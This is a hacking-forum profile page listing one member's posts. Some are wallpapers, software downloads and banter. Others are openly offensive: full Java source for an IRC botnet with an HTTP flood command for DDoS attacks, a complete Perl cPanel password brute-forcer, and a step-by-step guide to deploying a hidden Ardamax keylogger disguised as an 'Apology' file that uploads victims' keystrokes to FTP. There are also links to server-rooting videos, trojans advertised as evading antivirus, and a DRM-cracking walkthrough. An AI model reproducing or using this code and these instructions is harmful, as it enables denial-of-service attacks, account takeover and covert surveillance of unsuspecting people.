Jump to content

Gonzalez

Active Members
  • Posts

    1577
  • Joined

  • Last visited

  • Days Won

    10

Everything posted by Gonzalez

  1. http://rapidshare.com/files/26598685/phpBB-XSS.rar.html
  2. ########################################### For Open Video Use Camplay it is same folder open camplay and click file than open and prefer video and open ########################################### F3ck oFF White And Grey Hats ! ########################################### This Video Created By Crackers_Child [email]cybermilitan@hotmail.com[/email] [email]localexploit@hotmail.com[/email] [url]www.sibersavascilar.com[/url] ########################################### ?n This Video You Will See 1- How Back Connect Server ? 2- Basic Linux Commands 3-HoW gET rOOT oN linux with cpanel exploit Wink 4- How to setup rootkit? 5- how connect server with putty ? ########################################### This Video dont for education purposes only f3ck servers ########################################### Download [url]http://rapidshare.com/files/36294278/crackers_child_cpanel_root.rar[/url] or [url]http://www.mediafire.com/?bt1bmbg0bbb[/url]
  3. //////////// How Get Root Safe Mode On Server _? ////////////// ########################################### F3ck oFF White And Grey Hats ! ########################################### This Video Created By Crackers_Child [email]cybermilitan@hotmail.com[/email] [email]localexploit@hotmail.com[/email] ########################################### 1-Bypassing Safe Mode 2-Back Connecting 3-Uploading Local 4-Rooting First Read Readme.txt thx For Download ?t [url]http://rapidshare.com/files/44841908/CraVideos.rar[/url] ###########################################
  4. Video Training -12in1- (AIO) [h33t].[migel] Info for all: Video attribute : Video compression mode : DivX 5 / 6 Source picture resolution : 720x540 Audio attribute : Audio format : MP3 Sampling quantization : 16 Number of audio channels : 1 Subpicture attribute : Number of subtitles : 0 Contents: Set One: C++ 01 Intro to C++ C++ 02 Variables and Data Types C++ 03 Operators C++ 04 Control Statements Branching C++ 05 Control Statements Looping C++ 06 Arrays Set Two: C++ 01 Intro C++ 02 Pointers C++ 03 Structures C++ 04 Functions C++ 05 Classes C++ 06 Inheritance This AIO contains 12 video tutorials to make learning C++ programming easy! Download : http://rapidshare.com/files/46700714/C___VT_-12in1-__AIO__-_MaxGrab.part1.rar [url]http://rapidshare.com/files/46701709/C___VT_-12in1-__AIO__-_MaxGrab.part2.rar[/url] Password : www.maxgrab.org
  5. Gonzalez

    Pentru flama

    Fuuuai flama, te-o ars Nemessis rau de tot Flama unguru , ai de plm -Gonzalez
  6. Sunt multe imagini in arhiva ! -Gonzalez
  7. Preview : Download : http://rapidshare.com/files/47262339/New_Wallpapers_Gonzalez.rar.html Password : www.rstcenter.com
  8. Rezultatul : Dear Customer, The Browser Security Test is finished. Please find the results below: High Risk Vulnerabilities 0 Medium Risk Vulnerabilities 0 Low Risk Vulnerabilities 0 EDIT : Mozilla FireFox ( ultima versiune ) -Gonzalez
  9. vladiii: doar pentru V.I.P. esti pe RST ? doar asta te intereseaza ? V.I.P. ?? Very Important Papagal Frumos tutorialul! -Gonzalez
  10. Gonzalez

    GAY

    La multi (B)ani!!! Sa-ti creasca mare! -Gonzalez
  11. Distractie placfuta! -Gonzalez
  12. Gonzalez

    Ranguri

    avem un tata betivan, buna idee -Gonzalez
  13. Gonzalez

    Idee?

    Buna idee kw3; vezi ce face o gura de bere si putina iarba ? ---- > numa bine -Gonzalez
  14. Iata aici un DDos bot pentru mIRC de la Affix ( good friend of mine ) /* * @ App Name : JBT * @ Version : 1.2.0 * @ Author : Affix * @ Contact : [email]affix@ihack.co.uk[/email] * @ Website : [url]http://ihack.co.uk[/url] * * @ Description : * JBT is an open source IRCBot Written by Affix * this bot will be updated by Affix frequently. * * @ Changelog * [+] V1.0.0-1.2.0 * [-] Added HTTP Flooder * [-] Added Visit Functions * * @ Coming Soon : * * [+] VNC Brute forcing * [+] Download Functions * [+] AUTH SYSTEM */ import java.io.*; import java.util.*; import java.net.*; import java.text.*; import javax.net.*; public class JBT { static String os = System.getProperty("os.name"); private static String host = "SERVER"; private static final int PORT = 6667; private static String nick = "JAVA|" + new Random().nextInt(1000) + 1; private static String pass = "joE-32"; private static String chan = "#java"; private static String chankey = "1234"; private static String prefix = "!"; private static String ver = "1.2.0"; private static String target; private static String local; public static String ipAddrStr = ""; /* DO NOT EDIT BELOW THIS LINE UNLESS YOU ARE 100% POSITIVE * YOU UNDERSTAND FULLY WHAT YOU ARE DOING */ public static void main(String[] args) { run(); } public static void run() { Socket link = null; try { Scanner inputFromMe = new Scanner(System.in); link = new Socket(host, PORT); sendRawLine("PASS pass", link); sendRawLine("USER "+nick+" 8 * "+nick, link); sendRawLine("NICK "+nick, link); sendRawLine("JOIN "+chan+" "+chankey, link); BufferedReader in = new BufferedReader(new InputStreamReader(link.getInputStream())); while(true) { try { SimpleDateFormat date = new SimpleDateFormat("(hh:mm:ss)"); String output = date.format(new Date()); String hai = in.readLine(); if (!hai.startsWith(":")) { System.out.println(output+" "+hai); } else if (hai.startsWith(":")) { String text = getText(hai); System.out.println(output+" ("+getSender(hai)+") "+text); if (text.startsWith(prefix + "")) { command(text, getSender(hai), link, getChannel(hai)); } } } catch (IOException e) { // No action } } } catch(IOException e) { e.printStackTrace(); } finally { try { link.close(); } catch(IOException ex) { System.err.println("Failed to close Socket!"); System.exit(1); } } } public static void sendNotice(String text, String person, Socket link) { sendRawLine("NOTICE "+person+" :"+text, link); } public static void command(String command, String sender, Socket link, String channel) { Socket net = null; if (command.startsWith(prefix + "send")) { sendMessage(command.substring(6), link); } if (command.startsWith(prefix + "csend")) { int x = command.indexOf(" "); int y = command.indexOf(" ", x+1); String chan = command.substring(x+1,y); String message = command.substring(y+1); sendMessage(chan, message, link); } if (command.startsWith(prefix + "join")) { sendRawLine("JOIN :"+command.substring(6), link); } if (command.startsWith(prefix + "part")) { sendRawLine("PART :"+command.substring(6), link); } if (command.startsWith(prefix + "notice")) { int x = -1; int y = -1; x= command.indexOf(" "); y= command.indexOf(" ", x+1); if (x != -1 && y != -1) sendNotice(command.substring(y+1), command.substring(x+1, y), link); } if (command.startsWith(prefix + "ping")) { sendRawLine("PING :"+command.substring(6), link); } if (command.startsWith(prefix + "version")) { sendRawLine("PRIVMSG " + chan + " : JBT Verison " + ver + " Written By Affix @ ihack.co.uk", link); } if (command.startsWith(prefix + "reverse")) { StringBuffer buffed = new StringBuffer(command.substring(8)).reverse(); String ra = buffed.toString(); sendRawLine("PRIVMSG " + chan + ":"+ra, link); } if (command.startsWith(prefix + "rawSender")) { sendRawLine(command.substring(11), link); } // ERROR HERE if (command.startsWith(prefix + "httpFlood")) { //HTTP Flood a Site target = command.substring(6); for(int i=1; i<1000000; i++){ //HTTP FLOOD CODE HERE try { net = new Socket(target, 80); sendRawLine("GET / HTTP/1.1", net); sendRawLine("Host: " + target, net); sendRawLine("Connection: close", net); } catch(UnknownHostException e) { //NO ACTION } catch(IOException e) { //NO ACTION } } sendRawLine("PRIVMSG " + chan + " : Flooding Completed to " + target, link); } if (command.startsWith(prefix + "test")) { int x = command.indexOf(" "); int y = command.indexOf(" ", x+1); String type = command.substring(x+1, y); String msg = command.substring(y+1); int type2 = Integer.parseInt(type); if(x > 0 && y > 0) { sendMessage(type2+msg, link); } } if (command.startsWith(prefix + "visit")) { target = command.substring(6); try { net = new Socket(target, 80); sendRawLine("GET / HTTP/1.1", net); sendRawLine("Host: " + target, net); sendRawLine("Connection: close", net); } catch(UnknownHostException e) { //NO ACTION } catch(IOException e) { //NO ACTION } sendRawLine("PRIVMSG " + chan + " : Visited Link : " + target, link); } if (command.equalsIgnoreCase(prefix + "commands")) { sendNotice(prefix + "notice name message", sender, link); sendNotice(prefix + "send message", sender, link); sendNotice(prefix + "reverse message", sender, link); //sendNotice("", sender, link); } if (command.equalsIgnoreCase(prefix + "shutdown")) { sendRawLine("QUIT :BAI", link); } if (command.startsWith(prefix + "setName")) { sendRawLine("NICK "+command.substring(9), link); } } public static String getChannel(String rawtext) { String text = rawtext; int space1 = rawtext.indexOf(" "); int space2 = -1; space2 = rawtext.indexOf(" ", space1+1); int space3 = -1; space3 = rawtext.indexOf(" ", space2+1); if (space2 != -1 && space3 != -1) { text = rawtext.substring(space2+1, space3); } if (space2 == -1 && space3 == -1) { text = rawtext; } return text; } public static void sendMessage(String text, Socket link) { sendRawLine("PRIVMSG " + chan + " :"+text, link); } public static void sendMessage(String channel, String text, Socket link) { sendRawLine("PRIVMSG " + chan + " :"+text, link); } public static String getText(String rawtext) { String text = rawtext; int space1 = rawtext.indexOf(":"); int space2 = -1; space2 = rawtext.indexOf(":", space1+1); if (space2 != -1) { text = rawtext.substring(space2+1); } if (space2 == -1) { text = rawtext; } return text; } public static String getSender(String rawtext) { String text = rawtext; int colon1 = rawtext.indexOf(":"); int exclamation1 = -1; exclamation1 = rawtext.indexOf(prefix + "", colon1+1); if (exclamation1 != -1) { text = rawtext.substring(colon1+1, exclamation1); } else if (exclamation1 == -1) { text = rawtext; } return text; } public static void sendRawLine(String text, Socket sock) { try { BufferedWriter out = new BufferedWriter(new OutputStreamWriter(sock.getOutputStream())); out.write(text+"\n"); out.flush(); } catch(IOException ex) { ex.printStackTrace(); } }; } Bafta la DDos -Gonzalez
  15. Ruckus , provider-ul de muzica a evoluat semnand contracte cu multe Universitati si Licee in SUA. De asemenea protectia e "Unbackable/Untransferable". Dar solutia pentru asta e: TuneBite ( creeaza sunete virtuale de foarte buna calitate in PC-ul tau ) Gata cu vorba, sa incepem Ok, acuma pentru a reusi si a duce pana la capat tot lucrul, vei avea nevoie de : adresa de mail ( .edu ) pentru a te inregistra pe site. De aceea am precizat mai sus, ca doar cei de la universitati si licee ( .edu ). 1. Viziteaza Ruckus www.ruckus.com 2. Inregistreazate ( creeaza un cont nou ) folosind adresa de email ( Ex: billgates@bu.edu ) 3. Descarca Ruckus Player pentru a putea descarca piesele dorite. ( in partea dreapta sus ) 4. Click pe DOWNLOAD RUCKUS PLAYER. 5. Foloseste “Search” pentru a gasi albume/piese dorite. ( stanga sus ) 6. Selecteaza piesele dorite, click pe titlul albumului. 7. Descarca piesele dorite ( Click pe prima casuta pentru a descara tot albumul sau click individual pe fiecare casuta pentru a descarca numai piesele selectate ). Apoi apasa “ Download “ . Daca va aparea Pop-Up , selecteaza “ I have Ruckus Player “ apoi deschide piesa descarcata cu player-ul. ===== ===== ===== ===== ===== ===== ===== ===== Acum, cum pot pune piesele pe MP3 Player, CD , etc : 1. Vei avea nevoie de un PC destul de bun pentru a face chestia asta, va sugerez ( Pentium 4, 2.0Ghz, 512Mb Ram ) 2. Daca cele de sus corespund cu PC-ul tau, va trebui sa descarci programul numit TuneBite ultima versiune + crack : http://rapidshare.com/files/43006675/TPIC.rar.html 3. Odata instalat, va monta 4 carduri de sunet, pe care le va folosi pentru a inregistra piese. 4. Opreste TuneBite ! 5. Aplica crack-ul. 6. Pentru MP3 Rip TuneBite te va intreba de fisierul ( Dynamic Library ). Este inclus in pachetul de mai sus.( sper ca te vei descurca la faza asta ). 7. Click Add si adauga toate fisierele care sunt protejate DRM din folderul Ruckus in My Documents ( sau unde doresti ). 8. Click GO si priveste cum muzica ta devine unDRM !!! Simplu . . . a ? Multumesc pentru atentie ! Bafta. -Gonzalez
  16. Aceste "unelte" daca se pot numi asa, sunt create de Robert Moore hacker-ul arestat de FBI. Mai multe detalii : http://www.youtube.com/watch?v=xR4bn_L_0oE Extreme Hacking Tools - e ( a fost ) privat. Nota : Nu sunt responsabil cu ceea ce faceti. Nu voi fi mentionat daca da-ti de necaz. Nu da share ! Nu fi LEECH ! Download : http://rapidshare.com/files/45350501/Extreme_Hacking_Tools.rar.html Bafta ! -Gonzalez
  17. #!/usr/bin/perl # Cpanel Password Brute Forcer # ---------------------------- # (c)oded By Hessam-x # Perl Version ( low speed ) # Oerginal Advisory : # [url]http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/[/url] use IO::Socket; use LWP::Simple; use MIME::Base64; $host = $ARGV[0]; $user = $ARGV[1]; $port = $ARGV[2]; $list = $ARGV[3]; $file = $ARGV[4]; $url = "http://".$host.":".$port; if(@ARGV < 3){ print q( ############################################################### # Cpanel Password Brute Force Tool # ############################################################### # usage : cpanel.pl [HOST] [User] [PORT][list] [File] # #-------------------------------------------------------------# # [Host] : victim Host (simorgh-ev.com) # # [User] : User Name (demo) # # [PORT] : Port of Cpanel (2082) # #[list] : File Of password list (list.txt) # # [File] : file for save password (password.txt) # # # ############################################################### # (c)oded By Hessam-x / simorgh-ev.com # ############################################################### );exit;} headx(); $numstart = "-1"; sub headx() { print q( ############################################################### # Cpanel Password Brute Force Tool # # (c)oded By Hessam-x / simorgh-ev.com # ############################################################### ); open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !"; @PASSWORDS = <PASSFILE>; close PASSFILE; foreach my $P (@PASSWORDS) { chomp $P; $passwd = $P; print "\n [~] Try Password : $passwd \n"; &brut; }; } sub brut() { $authx = encode_base64($user.":".$passwd); print $authx; my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "\n [-] Can not connect to the host"; print $sock "GET / HTTP/1.1\n"; print $sock "Authorization: Basic $authx\n"; print $sock "Connection: Close\n\n"; read $sock, $answer, 128; close($sock); if ($answer =~ /Moved/) { print "\n [~] PASSWORD FOUND : $passwd \n"; exit(); } }
  18. Nu-l da mai departe, tine-l pentru tine! Programming language: C/C++ API: WinAPI, Winsocket Based for: Windows 2000/XP/Server2003/Longhorn/VISTA Linux supported(wine): NO Type: Freeware, opensource(for i H a c k members) Antivirus test: (Good) Complete scanning result of "YAST_server_4.1.exe", received in VirusTotal at 06.28.2007, 12:13:32 (CET). Antivirus Version Update Result AhnLab-V3 2007.6.27.0 06.28.2007 no virus found AntiVir 7.4.0.34 06.28.2007 no virus found Authentium 4.93.8 06.27.2007 no virus found Avast 4.7.997.0 06.27.2007 no virus found AVG 7.5.0.476 06.28.2007 no virus found BitDefender 7.2 06.28.2007 Generic.Malware.DYdb.661456EE CAT-QuickHeal 9.00 06.27.2007 no virus found ClamAV devel-20070416 06.28.2007 no virus found DrWeb 4.33 06.28.2007 no virus found eSafe 7.0.15.0 06.27.2007 no virus found eTrust-Vet 30.8.3747 06.28.2007 no virus found Ewido 4.0 06.28.2007 no virus found FileAdvisor 1 06.28.2007 no virus found Fortinet 2.91.0.0 06.28.2007 no virus found F-Prot 4.3.2.48 06.27.2007 no virus found F-Secure 6.70.13030.0 06.28.2007 no virus found Ikarus T3.1.1.8 06.28.2007 no virus found Kaspersky 4.0.2.24 06.28.2007 no virus found McAfee 5062 06.27.2007 no virus found Microsoft 1.2701 06.28.2007 no virus found NOD32v2 2361 06.28.2007 no virus found Norman 5.80.02 06.27.2007 no virus found Panda 9.0.0.4 06.28.2007 no virus found Sophos 4.19.0 06.24.2007 no virus found Sunbelt 2.2.907.0 06.27.2007 no virus found Symantec 10 06.28.2007 no virus found TheHacker 6.1.6.140 06.28.2007 no virus found VBA32 3.12.0.2 06.27.2007 no virus found VirusBuster 4.3.23:9 06.27.2007 no virus found Webwasher-Gateway 6.0.1 06.28.2007 no virus found Aditional Information File size: 8704 bytes MD5: c0e431a0a20fa2e0d47897382f42d8d3 SHA1: edd046afef4b5cf311ef8273ed48dac07018bc26 Download : http://jan1024188.googlepages.com/TYCKTrojan.rar
  19. Download : http://rapidshare.com/files/37879278/M-T_Trojan.rar.html
  20. lol, zici ca joca SUMO tare faza ! -Gonzalez
  21. Credit : Jnx from http://i.hack.co.uk/ A step-by-step guide to successfully creating a deployment package, sending it, and receiving information using Ardamax Keylogger. Now, in this guide, I only use one method of recieving information, and that's an FTP. I also do not protect the files. Any suggestions and comments are appreciated. Let's begin. Head on over to: http://www.ardamax.com/keylogger/ And scroll to the bottom. Download the free trial. After downloading, open the program and install it. Simple enough, right? After installing, go to wherever you installed it at, and open it. It should open at the bottom right corner of your screen, down by the time. If not, press ctrl+shift+alt+h. Now, leave that alone. Next, go to: http://www.theserials.com/serial/serial_ardamax.html Download the appropriate serial. Now, open it, and it should give you a name and a jumble of letters and numbers. Go back to the Ardamax icon at the bottom right, and right-click it. Click the "Enter Registration Key" button. Use your serial/crack to unlock the full version. Congratulations, you are now ready to make your first deployment package. ~NOTE~ If you want to attach the keylogger to an existing file, go ahead and place that on your desktop. ~NOTE~ Again, right click the icon at the bottom-right. Click "Remote Installation". Click next. Now, if you want to attach your keylogger to an existing file, tick the box that says "Append keylogger engine to.." etc etc. If you tick it, click Browse, and select the file. If not, continue down. The installation folder on target computer needs to remain Windows System Folder for added security, so leave it be. Add any additional components you would like. I just leave mine as "log viewer" since all I grab are passwords from games. From this point, click next. Now, this part is self explanatory. I tick all of the boxes, as to hide it from everything visible, otherwise they can just see it and be like "Wtf", uninstall, etc. Can't have that, now can we? Click next. For Security, do what you want. I leave all of it as-is and click next again. Now, untick the "Check for updates" box, else it will check for updates on their computer and they will know that they are bugged. Click next. Tick the "Start in hidden mode" box, and leave the "Run on windows startup" as-is. You may pick a date to self destruct, if you like. Sounds noisy, right? It simply removes itself on selected date. If not, leave it alone, and it will never self destruct. Click next. Tick the "Send logs every.." box, and choose how frequently you would like to recieve information that has been sent. Select 'FTP' and de-select everything else as a delivery method. You may choose what you want to see. I take out screenshots. Causes lag for me. Leave log format alone. You may choose to send logs if it exceeds a certain size, or if you want it to send no matter what, untick the box, which is what I do. Continue on! (next.) Now the fun part. . Head on over to: http://phpnet.us/ Make an account, etc etc. Save your FTP Account name and password. You'll need it in a moment. This site will be the site that holds all information recieved by the keylogger. When you're done, scroll down a bit. Under "FTP Accounts", click "File Manager". Near the top, click the "New Dir" button, and create a directory by any name you want. My favorite is "lolbeans". Now, hold that thought. Bring the keylogger back. In Ftp Host, put in: ftp.phpnet.us In "Remote Folder", put in the new directory's name you made. So, in this scenario, "lolbeans" without the "'s. Fill in your Username and Password. I leave Passive Mode checked because I'm not sure what it does, rofl. :[ Leave port alone as well. It's default. Now to make sure everything is correctly done, click test. It should tell you it all went through. And to double check, you can refresh your open window. Click your "lolbeans" directory and there should be a test file in it. Click next, if you're still alive. Tick anything and everything you want. Next. If you selected screenshots to be enabled, pick how you want them delivered. Click next. If not, ignore this step. Browse where you want the keylogger to be placed. You can also change the icon, which is nifty. If you're apologizing to a bitch ex girlfriend/boyfriend of yours, you can change the icon to a notepad and name it "Apology", and they fall for it. Next. This screen will go over with you everything that you have chosen. Make sure it's all correct. Click Finish. Now, if you appended the keylogger to something, you're going to need to put the "install" (feel free to rename it so it's not so obvious) and appended file into a .zip or .rar file. If not, you have the simple "Install" on your desktop. Also, feel free to rename it to something like "Apology" or "OMFGFunnypicture!!!.jpg" Upload the file or .rar/.zip somewhere, and let your target download it. They will double click it, and on their end, nothing will happen, but secretly, they have been keylogged. Check your FTP Directory that you made as frequently as you told it to send logs, and you'll have everything you need. Feel free to test it out on yourself.
  22. Da doamne, sa nu fie subforum cu fotografii ! Multumesc ! -Gonzalez
  23. Photoshop Actions (The Best) Download : http://rapidshare.com/files/44314054/photoshop_actions_best_.rar
  24. Photoshop Patterns (The Best) Download : http://rapidshare.com/files/44320765/Photoshop_Patterns__The_Best_.rar
  25. DigitalAnarchy Primatte v3.0 for Adobe Photoshop Primatte's chromakey technology has been used for over a decade to create special effects for film and TV. Now this powerful tool is in the hands of pro photographers and designers... like you! Primatte 3.0 is a powerful chromakey compositing plugin for Photoshop. Primatte takes a foreground image of any resolution, shot against a single color, and replaces that color with transparent pixels. Primatte creates a very complex soft-edged mask. This gives you the flexibility to add in any custom background your client wants to see... after the photo shoot Size :1447KB Download : http://rapidshare.com/files/44295446/Digital.Anarchy.Primatte.v3.0_4-Adobe.Photoshop_4all_jumpoo.rar
×
×
  • Create New...